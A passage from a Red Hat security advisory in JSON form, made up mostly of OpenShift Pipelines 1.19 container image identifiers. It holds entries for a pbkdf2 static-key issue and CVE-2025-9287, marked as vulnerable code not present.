"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pbkdf2: pbkdf2 silently returns static keys"
},
{
"cve": "CVE-2025-9287",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2025-08-20T22:00:53.821394+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
